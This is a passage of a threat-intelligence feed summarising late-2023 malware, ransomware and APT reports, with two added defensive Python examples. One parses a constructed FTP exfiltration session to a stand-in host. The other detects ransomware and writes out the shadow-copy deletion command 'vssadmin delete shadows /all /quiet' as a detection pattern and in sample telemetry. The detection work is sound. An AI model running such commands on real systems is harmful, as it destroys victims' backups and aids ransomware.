MEDIUM
Summary:
Researchers from Cybereason have observed DJvu variants being distributed through loaders posing as freeware. They present an overview of these threats and offer actionable recommendations for defending against them.
Source: https://www.cybereason.com/hubfs/dam/collateral/reports/threat-alert-DJvu-variant.pdf
2023-11-29
Tracking_Vidar_malware_infrastructure
LOW
+
Intel Source:
Censys
Intel Name:
Tracking_Vidar_malware_infrastructure
Date of Scan:
2023-11-29
Impact:
LOW
Summary:
A Censys researcher shared details on one of the more advanced stealers, Vidar. Vidar derives from Arkei Stealer but uses new methods to find its command-and-control servers and direct traffic to the attacker.
Source: https://censys.com/tracking-vidar-infrastructure/
2023-11-29
MetaStealer_analysis
LOW
+
Intel Source:
Russian Panda
Intel Name:
MetaStealer_analysis
Date of Scan:
2023-11-29
Impact:
LOW
Summary:
Russian Panda provided a technical analysis and overview of MetaStealer's functionality, which shares many similarities with RedLine Stealer.
Source: https://russianpanda.com/2023/11/20/MetaStealer-Redline%27s-Doppelganger/
2023-11-29
The_delivery_of_the_Remcos_Trojan
LOW
+
Intel Source:
Weixin
Intel Name:
The_delivery_of_the_Remcos_Trojan
Date of Scan:
2023-11-29
Impact:
LOW
Summary:
The QiAnXin Threat Intelligence Center observed that Spyder has undergone at least two rounds of updates since July, and found that attackers used Spyder to implant the Remcos Trojan on the target host. The Spyder malware is associated with the group QiAnXin tracks as 摩诃草 (Patchwork; rendered as "Maharashtra" in machine translation), and its main function is to download and run executable files issued by the C2 server.
Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247508856&idx=1&sn=256ab2e8e63a406a37088f1b133eb6ff&chksm=ea66540fdd11dd1924c87240bbf3675e276a17a5980df63d8aace47c92cbe40ca5e197f7e183&scene=178&cur_album_id=1539799351089283075#rd
2023-11-29
GoTitan_Botnet_Exploiting_Apache_ActiveMQ_Vulnerability
LOW
+
Intel Source:
Fortinet
Intel Name:
GoTitan_Botnet_Exploiting_Apache_ActiveMQ_Vulnerability
Date of Scan:
2023-11-29
Impact:
LOW
Summary:
Threat actors are actively exploiting the recently disclosed critical vulnerability in Apache ActiveMQ (CVE-2023-46604) to spread a new Go-based botnet named GoTitan and a .NET application called PrCtrl Rat, which can remotely take over compromised servers.
Source: https://www.fortinet.com/blog/threat-research/gotitan-botnet-exploitation-on-apache-activemq
2023-11-28
New_Persian_Remote_World_malicious_activity
LOW
+
Intel Source:
Cyble
Intel Name:
New_Persian_Remote_World_malicious_activity
Date of Scan:
2023-11-28
Impact:
LOW
Summary:
Cyble research center identified a website selling malicious tools, including RATs, loaders, and crypters, which can enable unauthorized control, identity theft, financial fraud, and system modifications. Recommendations to protect against these tools are provided, as well as MITRE ATT&CK® Techniques and Indicators of Compromise (IOCs).
Source: https://cyble.com/blog/new-persian-remote-world-selling-a-suite-of-malicious-tools/
2023-11-28
AgentTesla_infection_with_FTP_data_exfil
LOW
+
Intel Source:
Malware Traffic Analysis
Intel Name:
AgentTesla_infection_with_FTP_data_exfil
Date of Scan:
2023-11-28
Impact:
LOW
Summary:
This article provides an overview of an AgentTesla infection with FTP data exfiltration that occurred on 2023-11-22. It includes associated files, malware/artifacts, email headers, and infection chain. Malware/artifacts include a RAR archive, VBS file, script, PNG image, DLL, reversed base64 text, and AgentTesla EXE. Infection traffic is also listed, including IP addresses and ports used.
Source: https://www.malware-traffic-analysis.net/2023/11/22/index.html
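Two artifacts in this entry are routine work for anyone triaging the capture: the FTP control channel, which carries the stealer's credentials and upload names in cleartext, and the "reversed base64 text" stage, which the script reverses before decoding. The following is an added example, not the Malware Traffic Analysis material: a parser for a "follow TCP stream" style FTP transcript that recovers the login, passive-mode data endpoints and uploaded file names, a heuristic that marks the session as stealer exfiltration, and a decoder for the reversed-base64 artifact that checks for a PE header. The transcript, host, credentials, file name and encoded blob are constructed; the `PW_`/`KL_`/`SC_` report prefixes are an assumption about AgentTesla naming, not taken from the page.

```python
import base64
import re

# Constructed FTP control-channel transcript in "follow TCP stream" form
# (C: = victim, S: = exfil server). Host, credentials and filename are placeholders.
SAMPLE_FTP_STREAM = """\
S: 220 FTP server ready
C: USER exfil_user
S: 331 Password required for exfil_user
C: PASS Hunter2!
S: 230 Login successful
C: TYPE I
S: 200 Type set to I
C: PASV
S: 227 Entering Passive Mode (198,51,100,7,195,80)
C: STOR PW_victim-pc_2023_11_22_14_05_33.html
S: 150 Opening BINARY mode data connection
S: 226 Transfer complete
C: QUIT
S: 221 Goodbye
"""

PASV_RE = re.compile(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

# Report-name prefixes commonly reported for AgentTesla (passwords, keylog,
# screenshots). Assumed for this example; confirm against your own samples.
STEALER_PREFIXES = ("PW_", "KL_", "SC_")


def parse_ftp_stream(text):
    """Recover login, uploads and PASV data endpoints from the control channel."""
    session = {"user": None, "password": None, "uploads": [], "data_endpoints": []}
    for line in text.splitlines():
        side, _, payload = line.partition(": ")
        if side == "C":
            verb, _, arg = payload.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                session["user"] = arg
            elif verb == "PASS":
                session["password"] = arg
            elif verb in ("STOR", "STOU", "APPE"):   # every upload verb
                session["uploads"].append(arg)
        elif side == "S" and payload.startswith("227"):
            m = PASV_RE.search(payload)
            if m:
                h1, h2, h3, h4, p1, p2 = map(int, m.groups())
                session["data_endpoints"].append((f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2))
    return session


def classify_session(session):
    """Flag uploads whose names look like stealer reports."""
    stealer_uploads = [
        name for name in session["uploads"]
        if name.upper().startswith(STEALER_PREFIXES) or name.lower().endswith((".html", ".zip"))
    ]
    return {
        "suspicious": bool(stealer_uploads),
        "stealer_uploads": stealer_uploads,
        "credentials_recoverable": bool(session["user"] and session["password"]),
    }


def decode_reversed_base64(text):
    """Undo the dropper's trick: reverse the string, then base64-decode.
    Returns (bytes, looks_like_pe)."""
    raw = base64.b64decode(text[::-1], validate=True)
    return raw, raw.startswith(b"MZ")


# Constructed stand-in for the reversed-base64 artifact: a fake PE header,
# base64-encoded and then reversed the way the dropper expects to undo it.
SAMPLE_REVERSED_B64 = base64.b64encode(
    b"MZ\x90\x00\x03\x00\x00\x00This program cannot be run in DOS mode."
)[::-1].decode("ascii")


if __name__ == "__main__":
    s = parse_ftp_stream(SAMPLE_FTP_STREAM)
    print("login:", s["user"], "/", s["password"])
    print("data endpoints:", s["data_endpoints"])
    print("verdict:", classify_session(s))
    raw, is_pe = decode_reversed_base64(SAMPLE_REVERSED_B64)
    print("decoded", len(raw), "bytes, PE header:", is_pe)
```

The PASV endpoint is worth keeping: it is the connection that actually carries the stolen data, so it belongs in the IOC list next to the control-channel address, and the recovered credentials let the victim organisation ask the hosting provider to take the account down.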
2023-11-28
Actionable_day_in_a_Threat_Hunters_life_report
LOW
+
Intel Source:
Virustotal Blog
Intel Name:
Actionable_day_in_a_Threat_Hunters_life_report
Date of Scan:
2023-11-28
Impact:
LOW
Summary:
This article explains how to use VirusTotal Intelligence (VTI) to hunt and monitor malicious activity, using third-party intelligence reports. It provides examples of how to use VTI to search for samples with similar behaviors, and how to convert VTI queries into YARA rules for use in VirusTotal Livehunt.
Source: https://blog.virustotal.com/2023/11/actionable-threat-intel-vi-day-in.html
2023-11-28
Insight_into_groups_operating_Telekopye_bots
LOW
+
Intel Source:
Welivesecurity
Intel Name:
Insight_into_groups_operating_Telekopye_bots
Date of Scan:
2023-11-28
Impact:
LOW
Summary:
Welivesecurity published their article about Telekopye, a Telegram bot that helps cybercriminals scam people in online marketplaces. Telekopye can craft phishing websites, emails, SMS messages, and more.
Source: https://www.welivesecurity.com/en/eset-research/telekopye-hunting-mammoths-using-telegram-bot/
2023-11-28
The_2_state_sponcored_North_Korean_campaigns_targeting_job_seekers
MEDIUM
+
Intel Source:
PaloAlto
Intel Name:
The_2_state_sponcored_North_Korean_campaigns_targeting_job_seekers
Date of Scan:
2023-11-28
Impact:
MEDIUM
Summary:
Palo Alto Networks Unit 42 released research on North Korean activity leveraging remote work in two distinct campaigns they call Contagious Interview and Wagemole. Both campaigns have the goals of espionage and cryptocurrency theft.
Source: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/#post-131292-_6n6fflyzyu52
2023-11-28
Diving_Deep_into_RisePro_Malware
LOW
+
Intel Source:
Any.run
Intel Name:
Diving_Deep_into_RisePro_Malware
Date of Scan:
2023-11-28
Impact:
LOW
Summary:
Any.Run researchers have examined the RisePro malware. The information stealer was initially documented by the cybersecurity companies Sekoia and Flashpoint. It is distributed via fake software-crack websites through the pay-per-install (PPI) malware distribution service PrivateLoader. Its goal is to steal cryptocurrency wallets, passwords, and credit card data from compromised machines.
Source: https://any.run/cybersecurity-blog/risepro-malware-communication-analysis/
2023-11-27
DPRK_Crypto_Theft
MEDIUM
+
Intel Source:
SentinelOne
Intel Name:
DPRK_Crypto_Theft
Date of Scan:
2023-11-27
Impact:
MEDIUM
Summary:
This article discusses two North Korean-aligned macOS campaigns in 2023: RustBucket and KandyKorn. RustBucket used a Swift-based application bundle and KandyKorn used a five-stage attack with social engineering via Discord. KandyKorn is distributed as Cross-Platform Bridges.zip and contains multiple benign Python scripts. SentinelOne Singularity detects and protects against all known components of KandyKorn and RustBucket malware.
Source: https://www.sentinelone.com/blog/dprk-crypto-theft-macos-rustbucket-droppers-pivot-to-deliver-kandykorn-payloads/
2023-11-27
Phobos_Ransomware_Masquerading_As_VX_Underground
LOW
+
Intel Source:
Qualys
Intel Name:
Phobos_Ransomware_Masquerading_As_VX_Underground
Date of Scan:
2023-11-27
Impact:
LOW
Summary:
A Phobos ransomware sample is masquerading as VX-Underground and being distributed via stolen RDP connections. It halts execution if a Cyrillic alphabet is present on the system, kills processes, deletes shadow copies, and encrypts files, appending a ".VXUG" extension. Qualys Threat Research is monitoring the attack and providing hunting queries for detection.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2023/11/23/unveiling-the-deceptive-dance-phobos-ransomware-masquerading-as-vx-underground
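The behaviours listed above (shadow-copy deletion, then bulk encryption that appends `.VXUG`) are what a host-based detection keys on; the Cyrillic check is a kill switch, not something to detect. The following is an added example, not Qualys's hunting queries: it runs over constructed process-execution and file-rename telemetry in a line format invented for the example, flags the two standard shadow-copy deletion commands (generic ransomware preparation, not taken from the Qualys post), and raises a mass-rename alert when one process renames many files to the ransom extension inside a short window. The process names, paths, timestamps and thresholds are all constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

RANSOM_EXT = ".vxug"           # extension appended by the Phobos variant Qualys describes
RENAME_THRESHOLD = 20          # renames to the ransom extension per process per window
WINDOW = timedelta(seconds=60)

# Generic shadow-copy deletion command lines; common ransomware prep, assumed here.
SHADOW_DELETE_RES = [
    re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b", re.I),
]

# Invented telemetry line format: "<iso-ts> <pid> <image> EXEC <cmdline>"
#                                 "<iso-ts> <pid> <image> RENAME <old> -> <new>"
EVENT_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<pid>\d+)\s+(?P<image>\S+)\s+(?P<op>EXEC|RENAME)\s+(?P<rest>.*)$"
)


def build_sample_events():
    """Constructed telemetry (not real Phobos data): one process deletes shadow
    copies, then renames 25 files to .VXUG in under half a minute; a second
    process performs a single benign rename in the same window."""
    t0 = datetime(2023, 11, 23, 10, 1, 0)
    lines = [f"{t0.isoformat()} 4412 C:\\Users\\Public\\svc.exe EXEC vssadmin.exe delete shadows /all /quiet"]
    for i in range(25):
        ts = (t0 + timedelta(seconds=1 + i)).isoformat()
        lines.append(f"{ts} 4412 C:\\Users\\Public\\svc.exe RENAME C:\\data\\doc{i}.docx -> C:\\data\\doc{i}.docx.VXUG")
    lines.append(f"{(t0 + timedelta(seconds=5)).isoformat()} 800 C:\\Windows\\explorer.exe "
                 f"RENAME C:\\data\\notes.txt -> C:\\data\\notes-old.txt")
    return "\n".join(lines)


def parse_events(text):
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "pid": int(m["pid"]),
                           "image": m["image"], "op": m["op"], "rest": m["rest"]})
    return events


def detect_ransomware_activity(events):
    """Return (kind, pid, image, detail) alerts in time order.

    'shadow_copy_deletion' fires per matching command; 'mass_rename' fires once
    per process when its renames to RANSOM_EXT inside WINDOW reach the threshold."""
    renames = defaultdict(deque)   # pid -> timestamps of recent ransom-extension renames
    alerted = set()
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["op"] == "EXEC":
            if any(r.search(ev["rest"]) for r in SHADOW_DELETE_RES):
                alerts.append(("shadow_copy_deletion", ev["pid"], ev["image"], ev["rest"]))
            continue
        _, _, new_path = ev["rest"].partition(" -> ")
        if not new_path.lower().endswith(RANSOM_EXT):
            continue
        q = renames[ev["pid"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > WINDOW:   # expire renames outside the window
            q.popleft()
        if len(q) >= RENAME_THRESHOLD and ev["pid"] not in alerted:
            alerted.add(ev["pid"])
            alerts.append(("mass_rename", ev["pid"], ev["image"],
                           f"{len(q)} files renamed to {RANSOM_EXT} within {WINDOW.seconds}s"))
    return alerts


if __name__ == "__main__":
    for alert in detect_ransomware_activity(parse_events(build_sample_events())):
        print(alert)
```

In production the rename rule should key on "many distinct new extensions or one unknown extension" rather than a fixed string, because the extension changes between campaigns while the shadow-copy deletion, run from a user-writable path before any encryption, stays the same and is the earlier of the two signals.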
2023-11-27
Hackers_Utilize_Supply_Chain_Attacks_With_Zero_Day_Vulnerabilities
MEDIUM
+
Intel Source:
NIS
Intel Name:
Hackers_Utilize_Supply_Chain_Attacks_With_Zero_Day_Vulnerabilities
Date of Scan:
2023-11-27
Impact:
MEDIUM
Summary:
The National Intelligence Service (NIS) of Korea and the UK's National Cyber Security Centre (NCSC) have issued a joint advisory warning of the North Korean Lazarus group's use of a zero-day vulnerability in the MagicLine4NX software to perform supply-chain attacks against businesses.
Source: https://www.documentcloud.org/documents/24174869-rok-uk-joint-cyber-security-advisoryeng
2023-11-27
Exploiting_an_Apache_ActiveMQ_Vulnerability_CVE_2023_46604
MEDIUM
+
Intel Source:
ASEC
Intel Name:
Exploiting_an_Apache_ActiveMQ_Vulnerability_CVE_2023_46604
Date of Scan:
2023-11-27
Impact:
MEDIUM
Summary:
The Andariel threat group has been targeting South Korean companies and institutions with spear phishing, watering hole, and supply chain attacks. Recently, they have been exploiting a Log4Shell vulnerability, targeting MS-SQL servers, and abusing legitimate software. AhnLab Security Emergency Response Center (ASEC) discovered the group exploiting a remote code execution vulnerability (CVE-2023-46604) in Apache ActiveMQ servers to install malware, including NukeSped, HelloKitty ransomware, Metasploit Meterpreter's Stager, and CobaltStrike Beacon. The article provides hashes, C&C servers, and URLs associated with the malicious files.
Source: https://asec.ahnlab.com/en/59318/
2023-11-27
Parallax_RAT_infection
LOW
+
Intel Source:
Esentire
Intel Name:
Parallax_RAT_infection
Date of Scan:
2023-11-27
Impact:
LOW
Summary:
eSentire's Threat Response Unit (TRU) analyzed a Parallax RAT infection, following it from initial delivery through detection evasion to lateral movement. Recommendations for protecting against it are provided, as well as indicators of compromise.
Source: https://www.esentire.com/blog/unveiling-parallax-rat-a-journey-from-infection-to-lateral-movement
2023-11-24
Taking_Edge_Off_Systemjoker_in_Israel_Hamas_War_Spotlight
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Taking_Edge_Off_Systemjoker_in_Israel_Hamas_War_Spotlight
Date of Scan:
2023-11-24
Impact:
MEDIUM
Summary:
Researchers at Check Point have traced the development of SysJoker, a multi-platform backdoor now rewritten in Rust, which was used by an APT with ties to Hamas to target Israel.
Source: https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/
2023-11-24
Distributing_Atomic_Stealers_via_Fake_Browser_Updates
LOW
+
Intel Source:
Malwarebytes
Intel Name:
Distributing_Atomic_Stealers_via_Fake_Browser_Updates
Date of Scan:
2023-11-24
Impact:
LOW
Summary:
Researchers at Malwarebytes have discovered that AMOS (Atomic Stealer) is being distributed to Mac users through the fake browser update chain known as "ClearFake." This may be the first time one of the most prevalent social engineering campaigns, previously exclusive to Windows, has branched out to another operating system as well as to new geolocations.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/11/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates
2023-11-24
Missuse_of_MQTT_Messaging_Protocol_by_Stealthy_WailingCrab_Malware
LOW
+
Intel Source:
IBM Security Intelligence
Intel Name:
Missuse_of_MQTT_Messaging_Protocol_by_Stealthy_WailingCrab_Malware
Date of Scan:
2023-11-24
Impact:
LOW
Summary:
Researchers from IBM X-Force have been monitoring changes to the WailingCrab malware family, focusing on changes to the malware's C2 communication, which now abuses the MQTT Internet-of-Things (IoT) messaging protocol.
Source: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
2023-11-24
An_Overview_of_Volt_Typhoon
LOW
+
Intel Source:
SOC Radar
Intel Name:
An_Overview_of_Volt_Typhoon
Date of Scan:
2023-11-24
Impact:
LOW
Summary:
Volt Typhoon, also known as BRONZE SILHOUETTE, is a state-sponsored Advanced Persistent Threat (APT) group widely assessed to originate in China. Its activity has been closely observed and documented over the last few years by numerous cybersecurity companies, intelligence agencies, and government organizations.
Source: https://socradar.io/apt-profile-volt-typhoon/
2023-11-24
Konni_Campaign_Spreading_Through_a_Malicious_File
LOW
+
Intel Source:
Fortinet
Intel Name:
Konni_Campaign_Spreading_Through_a_Malicious_File
Date of Scan:
2023-11-24
Impact:
LOW
Summary:
According to FortiGuard Labs, the ongoing Konni campaign is using a Russian-language Word document containing a malicious macro. Although the document was created in September, internal telemetry shows continued activity on the campaign's C2 server.
Source: https://www.fortinet.com/blog/threat-research/konni-campaign-distributed-via-malicious-document
2023-11-23
Marai_Based_Botnet_Explores_Two_Zero_Days
LOW
+
Intel Source:
Akamai
Intel Name:
Marai_Based_Botnet_Explores_Two_Zero_Days
Date of Scan:
2023-11-23
Impact:
LOW
Summary:
Researchers from Akamai have uncovered a brand-new DDoS botnet, called InfectedSlurs, that targets routers and network video recorders (NVRs) by actively taking advantage of two zero-day vulnerabilities.
Source: https://www.akamai.com/blog/security-research/new-rce-botnet-spreads-mirai-via-zero-days
2023-11-23
Scattered_Spider_Attack_Analysis
LOW
+
Intel Source:
ReliaQuest
Intel Name:
Scattered_Spider_Attack_Analysis
Date of Scan:
2023-11-23
Impact:
LOW
Summary:
ReliaQuest recently observed an intrusion into a customer's internal IT documentation, with lateral movement from the customer's identity-as-a-service (IDaaS) provider to on-premises assets in a matter of minutes. The attack was attributed to the highly capable "Scattered Spider" cybercrime group. Scattered Spider, an "ALPHV"/"BlackCat" ransomware affiliate, infiltrates cloud and on-premises environments via social engineering.
Source: https://www.reliaquest.com/blog/scattered-spider-attack-analysis-account-compromise/
2023-11-23
The_distribution_of_Atomic_Stealer_to_Mac_users
LOW
+
Intel Source:
Malware news
Intel Name:
The_distribution_of_Atomic_Stealer_to_Mac_users
Date of Scan:
2023-11-23
Impact:
LOW
Summary:
Atomic Stealer, aka AMOS, is a known stealer for macOS. Recently a new development was observed: AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This is the first time this major social engineering campaign, previously reserved for Windows, has been observed targeting Mac users. The threat actors can widen their opportunities by stealing credentials and files of interest that can be monetized immediately or repurposed for additional attacks.
Source: https://malware.news/t/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates/75907
2023-11-23
Possible_Return_of_Genesis_Market_malicious_operations
LOW
+
Intel Source:
TrendMicro
Intel Name:
Possible_Return_of_Genesis_Market_malicious_operations
Date of Scan:
2023-11-23
Impact:
LOW
Summary:
The Trend Micro Managed XDR team observed malicious campaigns that were very similar to the ones used by Genesis Market. The threat actor used Node.js as a platform for the backdoor, Extended Validation (EV) Code Signing for defense evasion, and possibly Google Colab to host search engine-optimized download sites. The Trend Micro researchers provided in their blog a technical analysis of these attacks, including confirmation of, and speculation about, the other techniques used by the threat actor behind these activities.
Source: https://www.trendmicro.com/en_us/research/23/k/attack-signals-possible-return-of-genesis-market.html
2023-11-23
Modified_CyberLink_Installer_Distributing_by_Diamond_Sleet
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Modified_CyberLink_Installer_Distributing_by_Diamond_Sleet
Date of Scan:
2023-11-23
Impact:
MEDIUM
Summary:
Microsoft researchers have discovered a supply chain attack carried out by the North Korea-based threat actor Diamond Sleet (ZINC) using a malicious version of an application created by CyberLink Corp. The malicious file is a legitimate installer for a CyberLink application that has been altered to contain malicious code which downloads, decrypts, and loads a second-stage payload.
Source: https://www.microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/
2023-11-23
Malicious_Chrome_Extensions_Targeting_Brazil
LOW
+
Intel Source:
Trend Micro
Intel Name:
Malicious_Chrome_Extensions_Targeting_Brazil
Date of Scan:
2023-11-23
Impact:
LOW
Summary:
Researchers from Trend Micro have described the modular architecture of malicious Chrome extensions, which are made up of a number of highly obfuscated parts that use the Google Chrome API to monitor, intercept, and steal victim data.
Source: https://www.trendmicro.com/en_us/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html
2023-11-23
HrServ_web_shell_analysis
LOW
+
Intel Source:
Securelist
Intel Name:
HrServ_web_shell_analysis
Date of Scan:
2023-11-23
Impact:
LOW
Summary:
Securelist obtained a DLL file, identified as hrserv.dll, that turned out to be a previously unknown web shell exhibiting sophisticated features such as custom encoding methods for client communication and in-memory execution.
Source: https://securelist.com/hrserv-apt-web-shell/111119/
2023-11-22
A_Comparative_Analysis_of_Ransomware_Attacks_on_Windows_and_Linux
LOW
+
Intel Source:
Checkpoint
Intel Name:
A_Comparative_Analysis_of_Ransomware_Attacks_on_Windows_and_Linux
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
Check Point Researchers have published an analysis of a number of recent ransomware attacks targeting Linux and ESXi systems, which have been increasingly targeted in recent years. Although the variants targeting Linux are still comparatively rudimentary, comparable ransomware threats have long been established in Windows environments.
Source: https://research.checkpoint.com/2023/the-platform-matters-a-comparative-study-on-linux-and-windows-ransomware-attacks/
2023-11-22
Examination_of_Confluence_Server_Ransomware_Attack_with_C3RB3R
LOW
+
Intel Source:
Seebug
Intel Name:
Examination_of_Confluence_Server_Ransomware_Attack_with_C3RB3R
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
According to a security team, a vulnerability in Atlassian Confluence Data Center and Server software was recently disclosed. Attackers have repeatedly used this vulnerability to target Linux and Windows systems with fresh variants of the C3RB3R (Cerber) ransomware.
Source: https://paper.seebug.org/3076/
2023-11-22
The_DarkGate_Malware_as_a_Service_continuation
LOW
+
Intel Source:
Trellix
Intel Name:
The_DarkGate_Malware_as_a_Service_continuation
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
Trellix researchers analyzed DarkGate malware versions 4.6, 4.10.2, 4.17b, and the latest 5.0.19, mapping the rapid evolution of the malware. DarkGate is a complete toolkit that provides attackers with extensive capabilities to fully compromise victim systems.
Source: https://www.trellix.com/about/newsroom/stories/research/the-continued-evolution-of-the-darkgate-malware-as-a-service/
2023-11-22
Distribution_of_Malicious_LNK_File
LOW
+
Intel Source:
ASEC
Intel Name:
Distribution_of_Malicious_LNK_File
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
Recently, ASEC has observed a malicious LNK file being distributed to financial and blockchain corporation personnel through email and other channels.
Source: https://asec.ahnlab.com/en/59057/
2023-11-22
New_Java_Based_Rude_Stealer
LOW
+
Intel Source:
Cyble
Intel Name:
New_Java_Based_Rude_Stealer
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
Cyble researchers observed a new stealer named “Rude”. This Java-based malware is built specifically to discreetly pilfer confidential data from compromised machines.
Source: https://cyble.com/blog/new-java-based-rude-stealer-abuses-directx-diagnostic-tool/
2023-11-22
XWorm_Malware_campaign
LOW
+
Intel Source:
Any.Run
Intel Name:
XWorm_Malware_campaign
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
An analyst from Tweater shared on the Any.Run blog an exploration of the dynamics that occur once a successful connection is established between the XWorm operator's server and a victim who has executed the malware.
Source: https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/
2023-11-22
A_North_Korean_Group_is_Behind_Two_Job_Related_Campaigns
LOW
+
Intel Source:
Palo Alto
Intel Name:
A_North_Korean_Group_is_Behind_Two_Job_Related_Campaigns
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
Researchers from Unit 42 have uncovered two distinct campaigns targeting job-seeking activity, attributed to state-sponsored threat actors connected to the Democratic People's Republic of Korea (DPRK), also referred to as North Korea.
Source: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/
2023-11-22
Analysis_of_NoEscape_Ransomware_Group
LOW
+
Intel Source:
NCC Group
Intel Name:
Analysis_of_NoEscape_Ransomware_Group
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
NoEscape seems to focus on weak external services; initial access was gained by exploiting a publicly exposed Microsoft Exchange server within the victim's network. Exploitation resulted in webshells being placed on the server, which gave the threat actor an early foothold in the environment.
Source: https://research.nccgroup.com/2023/11/20/is-this-the-real-life-is-this-just-fantasy-caught-in-a-landslide-noescape-from-ncc-group/
2023-11-22
NetSupport_RAT
LOW
+
Intel Source:
VMware
Intel Name:
NetSupport_RAT
Date of Scan:
2023-11-22
Impact:
LOW
Summary:
Threat analysts from Carbon Black and VMware observed more than 15 new infections linked to NetSupport RAT in the last couple of weeks. Most of these were in the Education, Government, and Business Services sectors. VMware analysts described in their report their methods for detecting and preventing this malware, along with valuable insights and resources for defenders. In these latest attacks, the NetSupport RAT has been observed being downloaded onto a victim’s computer via deceptive websites and fake browser updates. The initial infection vector, however, can vary depending on the threat actors.
Source: https://blogs.vmware.com/security/2023/11/netsupport-rat-the-rat-king-returns.html
2023-11-21
Stately_Taurus_campaigns
LOW
+
Intel Source:
PaloAlto
Intel Name:
Stately_Taurus_campaigns
Date of Scan:
2023-11-21
Impact:
LOW
Summary:
Unit 42 researchers discovered three Stately Taurus attacks during the month of August. These attacks target entities in the South Pacific, including the Philippines government. The campaigns abused legitimate software, including Solid PDF Creator and SmadavProtect (an Indonesian-based antivirus solution), to sideload malicious files. Stately Taurus (aka Mustang Panda, Bronze President, Red Delta, Luminous Moth, Earth Preta and Camaro Dragon) has been operating since at least 2012. It is assessed to be a Chinese advanced persistent threat (APT) group that routinely conducts cyberespionage campaigns.
Source: https://unit42.paloaltonetworks.com/stately-taurus-targets-philippines-government-cyberespionage/
2023-11-21
The_Andariel_group_distributing_malware
LOW
+
Intel Source:
ASEC
Intel Name:
The_Andariel_group_distributing_malware
Date of Scan:
2023-11-21
Impact:
LOW
Summary:
ASEC analysts observed the Andariel group spreading malware via an attack that abused a certain asset management program. The Andariel group is known to be linked to a sub-organization of the Lazarus group.
Source: https://asec.ahnlab.com/en/59073/
2023-11-21
WinRAR_0_day_CVE_2023_38831_Vulnerability
MEDIUM
+
Intel Source:
Uptycs
Intel Name:
WinRAR_0_day_CVE_2023_38831_Vulnerability
Date of Scan:
2023-11-21
Impact:
MEDIUM
Summary:
Recently, it has been discovered that the WinRAR vulnerability tracked as CVE-2023-38831 lies in its handling of file extensions, creating opportunities for unauthorized code execution. The Uptycs Threat Research Team has outlined the WinRAR vulnerability in a previous blog, detailing its exploitation and providing technical insights.
Source: https://www.uptycs.com/blog/cve-2023-38831-winrar-zero-day
2023-11-21
INC_Ransom_Group_Targets_Western_Organizations_with_Double_Extortion
LOW
+
Intel Source:
cybereason
Intel Name:
INC_Ransom_Group_Targets_Western_Organizations_with_Double_Extortion
Date of Scan:
2023-11-21
Impact:
LOW
Summary:
Cybereason issues Threat Alerts regarding a new ransomware group, INC Ransom, that surfaced in August 2023. Operating primarily in the United States and Europe, the group employs a double and triple extortion strategy, leaking data on a dedicated blog and exerting pressure on victims to pay the ransom. INC Ransom's victims consist mainly of private sector businesses, with notable incidents involving a government organization and a charity association. The group's modus operandi involves using compromised credentials for lateral movement, deploying ransomware through WMIC and PSEXEC, and employing tools like MegaSync for data exfiltration.
Source: https://www.cybereason.com/blog/threat-alert-inc-ransomware
2023-11-21
A_new_Anti_Sandbox_technique_LummaC2_4_0_stealer
LOW
+
Intel Source:
Outpost24
Intel Name:
A_new_Anti_Sandbox_technique_LummaC2_4_0_stealer
Date of Scan:
2023-11-21
Impact:
LOW
Summary:
Outpost24 threat researchers took a deep dive into a new anti-sandbox technique that the LummaC2 v4.0 stealer uses to avoid detonation if no human mouse activity is detected.
Source: https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/
2023-11-21
LockBit_3_0_ransomware_exploiting_CVE_2023_4966
MEDIUM
+
Intel Source:
CISA
Intel Name:
LockBit_3_0_ransomware_exploiting_CVE_2023_4966
Date of Scan:
2023-11-21
Impact:
MEDIUM
Summary:
CISA, FBI, MS-ISAC, and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods associated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web application delivery control (ADC) and NetScaler Gateway appliances.
Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a
2023-11-21
Quasar_RAT_Delivery
LOW
+
Intel Source:
ISC. SANS
Intel Name:
Quasar_RAT_Delivery
Date of Scan:
2023-11-21
Impact:
LOW
Summary:
